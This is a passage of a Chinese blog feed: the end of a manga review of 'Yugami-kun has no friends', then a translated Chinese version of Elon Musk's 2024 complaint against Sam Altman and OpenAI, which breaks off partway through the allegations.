title="两人的距离"></a>两人的距离</h1><p>相对于强大的汤神，绵贯就宛如温顺的小兔子，时而被汤神批判，时而受汤神帮助。我不曾期待过出现什么恋爱情节，然而本作却给我带来了惊喜。</p><p>没错，绵贯是老好人。在前期的时候，她和汤神说得一样，不知道珍惜自己，绵贯始终交不到朋友，即使交到朋友后也遭人嫉妒受人欺负，都看得我有些着急。当绵贯找到自我，交到更多朋友后，她就慢慢地在环境中如鱼得水了，不再被学校的人称为“那个转校生”，有了自己的一席之地。如果没有碰到汤神这样有强烈个性的人，绵贯这个老好人的性格，是很难放到主角的位置上的。但是所谓塞翁失马焉知非福，也正因她是老好人，才能接纳汤神那看似不近人情的性格，即便在她知道了自己是因汤神才交不到朋友，也没有放弃与他交流，她就是这样一个人啊。拨开汤神的传言，去看到他的心。</p><p>于汤神而言，一开始他不过是想助绵贯一臂之力，以期她能更快找到朋友。随着后来目光在她身上停留越来越多，不知不觉中也对她有了一些微不可察的感情。从单纯批判，过渡到会说出能像落语中的角色一样进步也很不错这样的话，绵贯生气说绝交时藏在心底的难过与不安，最后一次棒球大赛上压力大时不自觉地看向了绵贯，惹绵贯哭时会破天荒给她写新年贺卡…一切的迹象都在表明不愿为人际关系困扰的汤神，他无法不对绵贯动心！</p><p>而绵贯这个小女生对待汤神又是怎样的呢？起初只是觉得汤神是个奇怪的好人，在修学旅行的迷路中渐渐地感到了对汤神的羡慕与敬佩之情，会偷偷给他在情人节送汤神喜欢的馒头。误以为是汤神的情书而颤抖，毫不忌讳地说喜欢坐在汤神旁边，被汤神抱着肩膀心砰砰直跳，允许汤神在她家穿着围裙做菜，被汤神捏了耳垂而脸红，会为了汤神而向全班人发火……这一切都是那么自然，水到渠成一般的情节。</p><p>最后的结尾，汤神接连邀请绵贯看了昂贵的落语，向她证明自己成为了平乐大师故事中的人物。绵贯希望能一直这样下去，但以为汤神已经达到目的就不会再邀请她而暗自失望。然而汤神完全没有收手的打算，还继续以后与绵贯一起看落语，理由是平乐的段子会不断创作完善，因为平乐一直都不会停止进化，所以要一直都去看。对话的一语双关，最后还用了映照在水中的月亮作为意象，实在是太浪漫啦！</p><p>这点让我欲罢不能啊，俩人在相处中渐渐互相喜欢，作品却没有走向恋爱，过程中只有一些细节展现了情感的变化，最后用落语来浪漫地结束。它不是恋爱作品，心动情节不多，更显得互动弥足珍贵~<br><img src="/images/yugami-kun_2.jpg" alt="yugami-kun"><br><img src="/images/yugami-kun_3.jpg" alt="yugami-kun"></p><h1 id="我的感想"><a href="#我的感想" class="headerlink" title="我的感想"></a>我的感想</h1><p>我喜欢这部漫画，它无疑是一部校园生活漫画，独来独往的汤神在平淡的校园中生活，顺便加了一点喜剧情节和作者思考作为调味料。如果是和汤神类似的人，想必会获得很多共鸣。如果是如漫画中受到人际关系苦恼的人，也许会从汤神身上获得一些启发。作品只是在用轻松的方式表达了作者对生活的思考。</p><p>在当下时代，人们普遍喜欢或者说习惯于有爆点或曲折情节的作品。当我在看这部漫画时，我才意识到，我会不自觉地期待一些戏剧化的情节。可是我忽视了，即使是平凡的生活，也有很多美好蕴藏在其中。即便当今时代物欲横流，生活也从不缺乏美好，少的只是一双发现美好的眼睛和一颗感受美好的心。</p><p>从最后结局来看，作者对于人际关系的描绘相当克制，正如漫画中的角色们保持了恰到好处的距离。主角在毕业致辞上的有一句话我认为说得非常好，就以此来作为结尾吧：你们不需要交到100个朋友！与其被人际关系所摆弄，还不如一个朋友都不要交！首先要重视自己。不然，别人也不会重视你。你自己才会是你最好的伙伴。</p><p><img src="/images/yugami-kun_4.jpg" alt="绵贯千寻"></p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/Vol.16_cover.jpg&quot; alt=&quot;yugami-kun have no friend&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="漫画" scheme="http://example.com/categories/%E6%BC%AB%E7%94%BB/"/>
    
    
    <category term="漫画" scheme="http://example.com/tags/%E6%BC%AB%E7%94%BB/"/>
    
  </entry>
  
  <entry>
    <title>Elon Musk起诉openai和奥特曼</title>
    <link href="http://example.com/2024/03/05/musk-v-altman-openai-complaint-sf/"/>
    <id>http://example.com/2024/03/05/musk-v-altman-openai-complaint-sf/</id>
    <published>2024-03-04T16:00:00.000Z</published>
    <updated>2024-03-05T09:34:59.633Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>我认为这是一篇有价值的法律文书，因此使用了机翻+人工校对，有误之处欢迎指出，还请多多包含。</p><span id="more"></span><h1 id="加利福尼亚州高级法院-旧金山县"><a href="#加利福尼亚州高级法院-旧金山县" class="headerlink" title="加利福尼亚州高级法院 旧金山县"></a>加利福尼亚州高级法院 旧金山县</h1><p>原告：埃隆·马斯克（个人）</p><p>被告：萨穆埃尔·奥特曼（个人）、格雷戈里·布罗克曼（个人）、OPENAI, INC.（公司）、OPENAI, L.P.（有限合伙）、OPENAI, L.L.C.（有限责任公司）、OPENAI GP, L.L.C.（有限责任公司）、OPENAI OPCO, LLC（有限责任公司）、OPENAI GLOBAL, LLC（有限责任公司）、OAI CORPORATION, LLC（有限责任公司）、OPENAI HOLDINGS, LLC（有限责任公司）以及DOES 1至100（包括所有未指明的相关方）</p><p>案件编号：[不限管辖范围]</p><p>诉讼请求包括：(1)合同违约，(2)承诺不反悔，(3)违反受托责任，(4)根据加利福尼亚商业与专业法典第17200节及其后续条文的不公平竞争，以及(5)要求进行会计审计</p><p>要求陪审团审理</p><p>原告埃隆·马斯克（以下简称“原告”）基于所掌握的信息和信念，提出以下指控：</p><h1 id="当事人"><a href="#当事人" class="headerlink" title="当事人"></a>当事人</h1><ol><li>在2019年以前，原告是加利福尼亚州的居民。自2019年起，原告成为德克萨斯州的居民。</li><li>根据所掌握的信息和信念，原告指控萨穆埃尔·奥特曼是加利福尼亚州旧金山县的居民。</li><li>根据所掌握的信息和信念，原告指控格雷戈里·布罗克曼是加利福尼亚州旧金山县的居民。</li><li>OpenAI, Inc. 是一家于2015年12月8日按照特拉华州法律注册成立的非营利组织。OpenAI, Inc. 已在加利福尼亚州州务卿处作为外地公司注册，并在旧金山市18街3180号设立了其主要营业场所。</li><li>OpenAI, L.P. 是一家于2018年9月19日按照特拉华州法律成立的有限合伙企业，最初命名为SummerSafe, L.P. OpenAI, L.P. 已在加利福尼亚州州务卿处作为外地有限合伙企业注册，并在旧金山市18街3180号设立了其主要营业场所。</li><li>OpenAI, L.L.C. 是一家于2020年9月17日按照特拉华州法律成立的有限责任公司。OpenAI, L.L.C. 在加利福尼亚州设立了其主要营业场所。</li><li>OpenAI GP, L.L.C. 是一家于2018年9月19日按照特拉华州法律成立的有限责任公司。OpenAI GP, L.L.C. 已在加利福尼亚州州务卿处作为外地有限责任公司注册，并在旧金山市18街3180号设立了其主要营业场所。</li><li>OpenAI OpCo, LLC 是一家于2018年9月19日按照特拉华州法律成立的有限责任公司。OpenAI OpCo, LLC 已在加利福尼亚州州务卿处作为外州有限责任公司注册，并在旧金山市Bryant街1960号设立了其主要营业场所。</li><li>OpenAI Global, LLC 是一家于2022年12月28日按照特拉华州法律成立的有限责任公司。OpenAI Global, LLC 已在加利福尼亚州州务卿处作为外州有限责任公司注册，并在旧金山市Bryant街1960号设立了其主要营业场所。</li><li>OAI Corporation, LLC 是一家按照特拉华州法律成立的有限责任公司。OAI Corporation, LLC 在加利福尼亚州设立了其主要营业场所。</li><li>OpenAI Holdings, LLC 是一家于2023年3月17日按照特拉华州法律成立的有限责任公司。OpenAI Holdings, LLC 已在加利福尼亚州州务卿处作为外州有限责任公司注册，并在旧金山市Bryant街1960号设立了其主要营业场所。</li><li>在本文中，“OpenAI, Inc.” 专指非盈利实体或非盈利分支，而“OpenAI” 泛指OpenAI, Inc., OpenAI, L.P., OpenAI, L.L.C., OpenAI GP, L.L.C., OpenAI OpCo, LLC, OpenAI Global, LLC, OAI Corporation, LLC以及&#x2F;或OpenAI Holdings, LLC。</li><li>原告目前尚不清楚Doe 1至Doe 100的具体姓名和身份信息。</li></ol><h1 id="管辖权和审判地"><a href="#管辖权和审判地" class="headerlink" title="管辖权和审判地"></a>管辖权和审判地</h1><ol start="14"><li>根据所获得的信息和信念，原告指控，本案所依据的许多事件、陈述和行为发生在加利福尼亚州的旧金山县，绝大多数被告居住或拥有其主要经营地点在此，且本案所依据的绝大多数事件、陈述和行为均发生在加利福尼亚州内。</li></ol><h1 id="一般指控"><a href="#一般指控" class="headerlink" title="一般指控"></a>一般指控</h1><h2 id="案件概览"><a href="#案件概览" class="headerlink" title="案件概览"></a>案件概览</h2><h3 id="A-人工通用智能的风险"><a href="#A-人工通用智能的风险" class="headerlink" title="A. 人工通用智能的风险"></a>A. 人工通用智能的风险</h3><ol start="15"><li><p>在20世纪的过程中，美国逐渐从一个主要基于人力劳动的经济体转变为一个主要基于人类知识的经济体，经济价值越来越多地由人类智能创造。随着世纪的进展，另一种范式转变已经在进行中：通过人工智能（AI）创造价值。早期AI程序能够在某些特定任务中胜过人类。几乎在可编程计算机发明之后立即，AI在如寻找道路网络中最快路径这样的高度形式化问题上展现出超人的表现。AI达到在需要更多创造力的问题上超越人类的水平则花费了更长的时间。1996年，IBM的深蓝AI程序击败了当时的世界国际象棋冠军加里·卡斯帕罗夫。这些程序虽然有用，但本质上是“一技之长”——它们的智能并不是通用的。深蓝拥有巨大的处理器阵列，但它只能下国际象棋。寻路算法可以解决迷宫或规划汽车路线，但它们不能绘画。  </p></li><li><p>从2000年代末到2010年代初，一种叫做“深度学习”的旧算法首次在低成本硬件上实现变得可行。这几乎在一夜之间引发了几乎所有AI项目性能的革命性提升。为将语音转换为文本、在语言之间翻译以及识别照片中显示的食物类型等开发了新的、顶级的算法。深度学习的一个标志是，算法不需要对手头的任务有显著的了解。它们通过训练示例学习每个任务，基本上是自我编程。这意味着它们比像深蓝这样的早期系统更具有通用性。  </p></li><li><p>随着深度学习算法变得越来越复杂，一些世界领先的AI研究人员将目光投向了被称为人工通用智能（AGI）的目标。AGI的基本概念是一个通用的人工智能系统——一种像人类一样能够完成广泛任务的机器。  </p></li><li><p>马斯克长期以来认识到，AGI对人类构成了严重威胁——可能是我们今天面临的最大的存在性威胁。他的担忧反映了斯蒂芬·霍金和Sun Microsystems创始人比尔·乔伊等前辈提出的担忧。我们的整个经济都建立在人类共同合作并找到解决艰难任务的最佳解决方案的事实之上。如果机器几乎可以比我们更好地解决任何任务，那么这台机器在经济上比我们更有用。正如乔伊所警告的，有了强大的AGI，“未来不需要我们。”马斯克公开呼吁采取各种措施来应对AGI的危险，从自愿性暂停到监管，但他的呼吁基本上没有得到重视。  </p></li><li><p>但是，像马斯克这样的一些人在AGI中看到了存在性威胁，其他人则将AGI视为利润和权力的来源。  </p></li><li><p>2014年，谷歌收购了专注于深度学习的研究小组DeepMind。DeepMind的最初开发之一是AlphaZero，一个下棋算法。然而，与以前的算法不同，AlphaZero使用了“强化学习”，其中程序通过用不同版本的软件自我对弈来学习下棋。它从随机对弈开始，对游戏策略一无所知。当软件的一个版本在对弈中赢得另一个版本时，获胜程序的内部路径会被“加强”，然后重复这一过程。  </p></li><li><p>AlphaZero迅速成为世界上最强的下棋系统。令人震惊的是，还宣布同一个程序也是世界上玩其他两种极其困难的游戏的最强程序。用谷歌&#x2F;DeepMind的话说，“从随机对弈开始，仅给定游戏规则而不提供任何领域知识，AlphaZero在24小时内达到了国际象棋、将棋（日本象棋）以及围棋的超人类水平，并在每种情况下都令人信服地击败了世界冠军程序。”  </p></li><li><p>有了DeepMind团队，谷歌立即跃升为AGI竞赛的前列。这一发展深深地困扰了马斯克。他相信（并且仍然相信），在像谷歌这样的封闭、营利性公司手中，AGI构成了对人类特别严重且有害的威胁。在2014年，与谷歌在其核心业务上竞争已经足够困难。谷歌从我们的搜索、电子邮件以及几乎每本图书馆中的书籍收集了独特的大量数据。尽管如此，直到那时，每个人都有潜力通过超越人类智能和努力工作与谷歌竞争。AGI将使竞争几乎变得不可能。</p></li></ol><h3 id="B-OpenAI-Inc-的创立协议"><a href="#B-OpenAI-Inc-的创立协议" class="headerlink" title="B. OpenAI, Inc.的创立协议"></a>B. OpenAI, Inc.的创立协议</h3><ol start="23"><li><p>奥特曼声称与马斯克对AGI构成的威胁有着共同的担忧。2015年，奥特曼写道，“超人类机器智能（SMI）的发展可能是对人类持续存在的最大威胁。我认为还有其他更有可能发生的威胁……但它们不太可能以SMI可能的方式摧毁宇宙中的每一个人。”同年晚些时候，奥特曼向马斯克提出了一个提议：他们联手创建一个非营利AI实验室，试图在AGI竞赛中赶上谷歌，但它将与谷歌完全相反。  </p></li><li><p>与布罗克曼一起，三人同意这个新实验室：(a) 将是一个为人类利益而非为营利公司寻求最大化股东利润的非营利机构开发AGI；并且(b) 将是开源的，在平衡相反的安全考虑因素时，不会因专有商业原因而保持其技术的封闭和秘密（“创立协议”）。反映了创立协议，马斯克将这个新的AI实验室命名为“OpenAI”，它将与谷歌&#x2F;DeepMind在AGI竞赛中竞争，并作为重要的平衡力量，但它的目的是为了人类的利益，而不是私人、营利性公司（更不用说世界上最大的科技公司之一）的股东的利益。  </p></li><li><p>创立协议也在其他地方进行了记录，包括在OpenAI, Inc.的2015年12月8日公司成立证书中，该证书确认其“结果技术将惠及公众，公司将在适用时寻求为公众利益开源技术。公司不是为了任何个人的私人利益而组织的。”证书进一步确认，公司的所有财产都是“不可撤销地”专用于这些约定的目的。  </p></li><li><p>依赖于创立协议，奥特曼、布罗克曼和OpenAI, Inc.在多个场合与马斯克重申，马斯克是OpenAI, Inc.创建的推动力，前几年为其提供了大部分资金，就研究方向提供建议，最重要的是，招募了世界领先的科学家和工程师在这个非营利企业工作，包括首席科学家伊利亚·苏茨克弗。对OpenAI, Inc.的招聘是在谷歌&#x2F;DeepMind不懈的招聘努力以及它们提供的丰厚薪酬面前的一项艰巨任务。没有马斯克的创立贡献和早期领导，就不会有OpenAI, Inc.马斯克从其成立之初一直到2020年9月14日继续对OpenAI, Inc.做出贡献。  </p></li><li><p>OpenAI的初始研究是在公开进行的，为设计、模型和代码提供了免费和公开的访问。当OpenAI, Inc.的研究人员发现，最初由谷歌发明的一种叫做“变换器”的算法能够在没有任何明确训练的情况下执行许多自然语言任务时，整个社区涌现出来，以增强和扩展OpenAI, Inc.发布的模型。这些社区扩展到了开源、草根努力和商业实体。  </p></li><li><p>奥特曼在2019年成为OpenAI, Inc.的首席执行官。2020年9月22日，OpenAI与微软签订了一项协议，将其生成式预训练变换器（GPT）-3语言模型独家授权给微软。然而，OpenAI发布了一篇详细的论文，描述了GPT-3的内部结构和训练数据，使社区能够自行创建类似的模型。最关键的是，微软的许可仅适用于OpenAI的预AGI技术。微软没有获得AGI的任何权利。并且，是由OpenAI, Inc.的非营利董事会，而不是微软，来决定OpenAI何时达到AGI。</p></li></ol><h3 id="C-2023年对创立协议的违背"><a href="#C-2023年对创立协议的违背" class="headerlink" title="C. 2023年对创立协议的违背"></a>C. 2023年对创立协议的违背</h3><ol start="29"><li><p>在2023年，被告奥特曼先生、布罗克曼先生和OpenAI烧毁了创立协议。</p></li><li><p>在2023年3月，OpenAI发布了迄今为止最强大的语言模型GPT-4。GPT-4不仅能进行推理，它在推理方面的能力还超过了平均水平的人类。它在律师的统一律考中得分位于90百分位，GRE语言考试中得分位于99百分位。它甚至在高级侍酒师考试中得分77%。在此期间，奥特曼先生使OpenAI从其原始使命和历史实践中急剧偏离，即使其技术和知识向公众开放。GPT-4的内部设计被保密，除了OpenAI——据信，还有微软之外，完全是个秘密。没有科学出版物描述GPT-4的设计。相反，只有吹嘘性能的新闻发布。据了解，这种保密主要是出于商业考虑，而不是安全。尽管GPT-4是由OpenAI使用原告和其他人的贡献开发的，这些贡献本意是为了造福公众，但GPT-4现在实际上成为了微软的专有算法，已经被整合进了其Office软件套件中。</p></li><li><p>此外，据了解，GPT-4是一个AGI算法，因此明确地不在微软2020年9月与OpenAI签订的独家许可范围内。在这方面，微软自己的研究人员公开表示，“鉴于GPT-4的能力的广度和深度，我们认为它可以合理地被视为人工通用智能（AGI）系统的早期（尽管仍不完整）版本。”此外，据了解，OpenAI目前正在开发一种称为Q*（Q星）的模型，它对AGI的主张甚至更强。正如所述，微软只拥有OpenAI某些预AGI技术的权利。但就微软的许可而言，由OpenAI, Inc.的董事会决定OpenAI是否已达到AGI，而在2023年11月发生了董事会政变。2023年11月17日，OpenAI, Inc.的董事会解雇了奥特曼先生，因为“对他继续领导OpenAI的能力失去了信心”，因为“他对董事会的坦诚不一”。在接下来的几天里，一系列令人震惊的事件发生了，奥特曼先生和布罗克曼先生联同微软，利用微软对OpenAI, Inc.的重大影响力，迫使OpenAI, Inc.的大多数董事会成员辞职，包括首席科学家伊利亚·苏茨克弗。奥特曼先生于11月21日被重新任命为OpenAI, Inc.的CEO。据了解，新的董事会成员是由奥特曼先生挑选并得到微软的认可的。新的董事会成员缺乏实质性的AI专业知识，并且据了解，他们被特意设计为无法独立判断OpenAI何时达到AGI——因此何时开发了一种不在微软许可范围内的算法。</p></li><li><p>2023年的这些事件构成了对创立协议的公然违背，被告实际上颠倒了它的头。直到今天，OpenAI, Inc.的网站仍然声称其宪章是确保AGI“惠及全人类”。然而，实际上，OpenAI, Inc.已经被转变为世界上最大的技术公司之一：微软的一个闭源事实上的子公司。在其新的董事会下，它不仅在开发AGI，实际上还在精炼AGI，以最大化微软的利润，而不是为了人类的利益。其技术，包括GPT-4，主要是为了服务微软的专有商业利益而保持闭源。事实上，随着2023年11月的剧变展开，微软的CEO夸耀说，如果“OpenAI明天消失了也无所谓。”他解释说，“我们拥有所有的知识产权和所有的能力。”“我们拥有人员，我们拥有计算能力，我们拥有数据，我们拥有一切。”“我们在它们下面，上面，周围。”</p></li><li><p>此案是为了迫使OpenAI遵守创立协议，回归其为人类利益开发AGI的使命，而不是为了个别被告和世界上最大的技术公司的个人利益。</p></li></ol><h1 id="详细指控"><a href="#详细指控" class="headerlink" title="详细指控"></a>详细指控</h1><h3 id="A-马斯克先生对AGI落入错误之手的担忧"><a href="#A-马斯克先生对AGI落入错误之手的担忧" class="headerlink" title="A. 马斯克先生对AGI落入错误之手的担忧"></a>A. 马斯克先生对AGI落入错误之手的担忧</h3><ol start="34"><li><p>2012年，埃隆·马斯克会见了DeepMind的联合创始人德米斯·哈萨比斯，一家追求盈利的人工智能公司。在这段时间左右，马斯克先生和哈萨比斯先生在加利福尼亚霍桑的SpaceX工厂相遇，讨论了社会面临的最大威胁。在这次对话中，哈萨比斯强调了AI进步对社会可能构成的潜在危险。</p></li><li><p>经过与哈萨比斯的对话，马斯克先生对AI变得超级智能、超越人类智能并威胁人类的可能性越来越担忧。实际上，马斯克先生并不是唯一一个对AI危险及DeepMind的研究感到恐惧的人。据报道，一位投资者在与哈萨比斯及DeepMind的投资者会面后评论道，他能为人类做的最佳事情就是当场射杀哈萨比斯。</p></li><li><p>马斯克先生开始与他的圈内人士讨论AI和DeepMind，包括谷歌母公司Alphabet, Inc.的时任CEO拉里·佩奇。马斯克经常在与佩奇的对话中提到AI的危险，但马斯克惊讶地发现，佩奇对此并不担心。例如，在2013年，马斯克与佩奇就AI的危险进行了热烈的讨论。他警告说，除非采取保护措施，“人工智能系统可能会取代人类，使我们的种族变得无关紧要甚至灭绝。”佩奇回应说这只不过是“进化的下一个阶段”，并声称马斯克是一个“物种主义者”——偏爱人类而不是智能机器。马斯克回应说：“嗯，是的，我支持人类。”</p></li><li><p>到了2013年底，马斯克极为担忧地得知谷歌计划收购DeepMind。当时，DeepMind是行业内最先进的AI公司之一。因此，马斯克深切担心DeepMind的AI技术将掌握在轻率看待其力量并可能将其秘密进行的人手中。</p></li><li><p>为了防止这项强大的技术落入谷歌手中，马斯克和PayPal的联合创始人卢克·诺塞克试图筹集资金购买DeepMind。这一努力最终导致了一次长达一小时的电话会议，马斯克和诺塞克做出了最后的努力，试图说服哈萨比斯不要将DeepMind卖给谷歌。马斯克告诉哈萨比斯：“[AI的未来]不应该由拉里[佩奇]控制。”</p></li><li><p>马斯克和诺塞克的努力未能成功。2014年1月有报道称DeepMind将被谷歌收购。然而，这并未阻止马斯克继续努力确保AI的安全发展和实践。</p></li><li><p>谷歌收购DeepMind后，马斯克开始“组织自己的一系列晚宴讨论，以探讨对抗谷歌和推动AI安全的方法。”马斯克还联系了巴拉克·奥巴马总统，讨论AI和AI安全问题。2015年，马斯克和奥巴马总统会面，期间马斯克解释了AI的危险并呼吁监管。马斯克感觉到奥巴马总统理解AI的危险，但监管始终未能实施。</p></li><li><p>尽管遇到这些挫折，马斯克继续倡导安全的AI实践。2015年，马斯克似乎找到了一个理解他对AI的担忧及他希望将第一个AGI保持在像谷歌这样的私人公司之外的人：被告萨姆·奥特曼。</p></li><li><p>当时，奥特曼是硅谷创业加速器Y Combinator的总裁。在此之前，奥特曼参与了多项创业活动。</p></li><li><p>奥特曼似乎与马斯克有着共同的AI担忧。在2014年的公开博客文章中，奥特曼表示，AGI的制造“将是技术史上的最大发展”。他指出，许多公司正朝着实现AGI迈进，但不幸的是，“好的公司对此非常保密。”</p></li><li><p>2015年2月25日，奥特曼还表达了对所谓的“超人类机器智能”发展的担忧，认为这“可能是对人类持续存在的最大威胁”，并强调“作为一个被编程去生存和繁衍的人类，我认为我们应该抵制它。”此外，奥特曼批评了那些认为“超人类机器智能”危险但又认为它“永远不会发生或肯定还很遥远”的人。他指责他们的思考“草率且危险。”</p></li><li><p>实际上，在2015年3月初，奥特曼强调了政府监管作为确保安全创造AI的手段的重要性，并建议“一群非常聪明的人拥有大量资源”很可能涉及“以某种方式涉及美国公司”的集团将是首个实现“超人类机器智能”的最可能的群体。</p></li><li><p>当月晚些时候，奥特曼联系马斯克，询问他是否有兴趣起草一封关于AI的公开信给美国政府。两人开始准备信件，并接触技术和AI领域的有影响力的人士征求签名。不久，整个行业便传开了这封信的消息。</p></li><li><p>例如，在2015年4月，哈萨比斯联系马斯克，表示他从多个来源得知马斯克正在起草一封呼吁对AI进行监管的信，致总统。马斯克向哈萨比斯阐述了对AI监管的支持，表示：“如果做得好，它可能会在长期内促进AI的发展。如果没有公众对监管提供的安心感，很可能出现AI造成巨大伤害，随后AI研究因被认为对公共安全构成威胁而被禁止。”</p></li><li><p>哈萨比斯就AI公开信联系马斯克五天后，宣布了Google DeepMind AI伦理委员会的首次会议，这是谷歌和DeepMind在谷歌收购DeepMind两年前承诺成立的委员会。马斯克被邀请成为委员会成员，并提议首次会议在加利福尼亚霍桑的SpaceX举行。马斯克在第一次会议后清楚地认识到，这个委员会不是一个认真的尝试，而是一种试图减缓AI监管的幌子。</p></li><li><p>这封公开信后来于2015年10月28日发布，获得了超过一万一千人的签名，包括马斯克、斯蒂芬·霍金和史蒂夫·沃兹尼亚克等人的支持。</p></li></ol><h3 id="B-OpenAI-Inc-的成立协议"><a href="#B-OpenAI-Inc-的成立协议" class="headerlink" title="B. OpenAI, Inc.的成立协议"></a>B. OpenAI, Inc.的成立协议</h3><ol start="50"><li><p>2015年5月25日，奥特曼先生给马斯克先生发了一封电子邮件，表达了他对“是否可能阻止人类发展AI”的深思。他认为答案几乎肯定是不可能。奥特曼先生写道：“如果AI的发展是不可避免的，那么最好让除了谷歌以外的其他人率先做到。”他提出了一个想法：由Y Combinator启动一个AI领域的“曼哈顿计划”。（不幸的是，这个名字可能非常恰当。）他建议：“我们可以构建一个模式，使得技术通过某种非盈利机构属于全世界，但如果项目成功，参与其中的人员可以获得类似于创业公司的报酬。显然，我们会遵守并积极支持所有相关的监管。”对此，马斯克回复：“这个话题值得进一步讨论。”  </p></li><li><p>经过进一步沟通后，奥特曼在2015年6月24日向马斯克提出了这个新“AI实验室”的详细方案。“其使命是创造首个通用人工智能，并用它来赋能个体——也就是说，推动一个分布式的、看似最安全的未来。更广泛地说，安全应作为首要条件。”“技术将由基金会所有，并被‘用于全世界的利益’。”他建议从7-10人的小团队开始，并从那里扩展。他还提出了一种治理结构。马斯克回应：“全都同意。”见附件2第1页。  </p></li><li><p>不久之后，奥特曼开始招募其他人参与这个项目的开发。值得一提的是，他邀请了格雷戈里·布洛克曼加入项目。  </p></li><li><p>2015年11月，奥特曼通过电子邮件让布洛克曼与马斯克取得联系。关于这个项目，布洛克曼对马斯克说：“我希望我们能作为一个中立的团队进入这个领域，广泛地寻求合作，并将对话转向人类的共同胜利，而非任何特定团体或公司的胜利。（我认为这是我们成为领先研究机构的最佳方式。）”对于一个专注于人类而非特定个人或团体利益的中立AI研究团队的设想感到乐观，马斯克告诉布洛克曼，他愿意承诺资金支持。  </p></li><li><p>马斯克提出了新实验室的名称，反映了成立协议的精神：“Open AI Institute”，简称“OpenAI”。  </p></li><li><p>以成立协议的这些原则为指导，马斯克与奥特曼和布洛克曼联手，正式启动并推进这个项目。马斯克在项目公开宣布之前就积极参与其中。例如，他就员工的薪酬方案向布洛克曼提出了建议，分享了他在薪酬和人才留存方面的策略。  </p></li><li><p>2015年12月8日，OpenAI, Inc.的公司成立证书在特拉华州州务卿处正式提交。该证书书面记录了成立协议的内容：<br>第三条：本公司将作为一家专门从事慈善和&#x2F;或教育目的的非营利公司组织，符合1986年修订的内部收入法典第501(c)(3)节或任何未来美国内部收入法的相应条款。本公司的具体目的是提供资金支持人工智能相关技术的研究、开发和分发。所得技术将造福公众，且公司将在适用时将技术开源以利公众。公司不是为任何个人的私人利益而设立的……第五条：本公司的财产将不可撤销地用于第三条中的目的，本公司的净收入或资产的任何部分都不得用于任何董事、官员或成员的利益，也不得用于任何私人的利益。在本公司解散或终止时，扣除或预留支付所有债务和负债后剩余的资产，将分配给一家专门从事慈善、教育和&#x2F;或宗教目的的非营利基金、基金会或公司，该机构必须根据内部收入法典第501(c)(3)节或任何未来联邦税法的相应条款确认其免税身份，或将其分配给联邦政府、州政府或地方政府，用于公共目的。  </p></li><li><p>OpenAI, Inc.于2015年12月11日对外公布。在公告中，马斯克和奥特曼被指定为联合主席，布洛克曼被任命为首席技术官。公告强调OpenAI旨在“造福人类”，其研究将“不受财务义务的约束”：OpenAI是一家非盈利人工智能研究公司。我们的目标是以最有可能造福全人类的方式推进数字智能，不受生成财务回报的需求所限。由于我们的研究不受财务义务的约束，我们可以更好地专注于产生积极的人类影响。见附件3第1页。</p></li></ol><h3 id="C-马斯克对于OpenAI-Inc-成功起步的关键作用"><a href="#C-马斯克对于OpenAI-Inc-成功起步的关键作用" class="headerlink" title="C. 马斯克对于OpenAI, Inc.成功起步的关键作用"></a>C. 马斯克对于OpenAI, Inc.成功起步的关键作用</h3><ol start="58"><li><p>在公开宣布的当天，马斯克在一封电子邮件中写道：“[我们]最重要的任务是招募最优秀的人才。”他承诺，帮助招聘工作将成为他“全天候不间断的首要任务”。他认识到：“我们在人手和资源上被众所周知的组织以巨大优势超越，但我们拥有正义的力量，这非常重要。我对这样的赔率感到乐观。”马斯克动用了自己的人脉、声望和权力来支持这一努力。事实上，OpenAI, Inc.是一个得到埃隆·马斯克支持的项目，他还担任联合主席，这对于OpenAI, Inc.的招聘工作极为关键，尤其是在面对Google&#x2F;DeepMind的竞争性招聘时。如果没有马斯克的参与、大量的支持努力和资源——他对创立协议的承诺——OpenAI, Inc.很可能根本无法起步。  </p></li><li><p>最初的关键聘用之一是首席科学家的职位。奥特曼、布洛克曼和马斯克都希望伊利亚·苏茨克沃，当时在谷歌担任研究科学家，出任这一职位。苏茨克沃博士在离开谷歌加入该项目之间犹豫不决，但最终是马斯克在OpenAI, Inc.公开宣布当天的一通电话，说服了苏茨克沃博士承诺加入项目，担任OpenAI, Inc.的首席科学家。  </p></li><li><p>马斯克在接下来的几个月里积极参与OpenAI, Inc.的招募工作。Google&#x2F;DeepMind对OpenAI, Inc.的招聘对象提出了越来越丰厚的反击报价，试图扼杀这个新兴企业。2月下旬，马斯克给布洛克曼和奥特曼发邮件，再次强调：“我们需要不遗余力地吸引顶尖人才。我们可以提高报价。如果必要，我们可以重新考虑现有员工的薪酬，这没有问题。要么我们吸引到世界上最优秀的人才，要么我们就会被Deepmind打败。不惜一切代价吸引顶尖人才对我来说都是可以接受的。Deepmind给我带来了极大的心理压力。如果他们赢了，他们‘一心统治世界’的理念将是非常糟糕的消息。考虑到那里的人才水平，他们显然正在取得重大进展，这也是理所当然的。”  </p></li><li><p>马斯克不仅仅是利用他的人脉和影响力来代表OpenAI, Inc.进行招聘。当他告诉布洛克曼和奥特曼提高报价并“不惜一切代价吸引顶尖人才”时，正是他在资助这些更高的报价。仅2016年一年，马斯克就为OpenAI, Inc.贡献了超过1500万美元，比任何其他捐赠者都多。他提供的资金使OpenAI, Inc.能够组建一个世界顶尖的团队。同样，在2017年，马斯克又向OpenAI, Inc.捐赠了近2000万美元，再次超过任何其他捐赠者。总的来说，从2016年到2020年9月，马斯克为OpenAI, Inc.贡献了超过4400万美元。  </p></li><li><p>此外，通过Musk Industries LLC，马斯克租赁了OpenAI, Inc.在旧金山先锋大厦的初始办公空间，并支付了月租费用。马斯克定期访问OpenAI, Inc.，参与公司的重要里程碑事件，例如2016年第一台DGX-1 AI超级计算机捐赠给OpenAI, Inc.时。马斯克会定期收到OpenAI, Inc.的进展更新，并提供他的反馈和建议。</p></li></ol><h3 id="D-奥特曼和布洛克曼多次重申创立协议"><a href="#D-奥特曼和布洛克曼多次重申创立协议" class="headerlink" title="D. 奥特曼和布洛克曼多次重申创立协议"></a>D. 奥特曼和布洛克曼多次重申创立协议</h3><ol start="63"><li><p>2017年，布洛克曼和其他人提出将OpenAI, 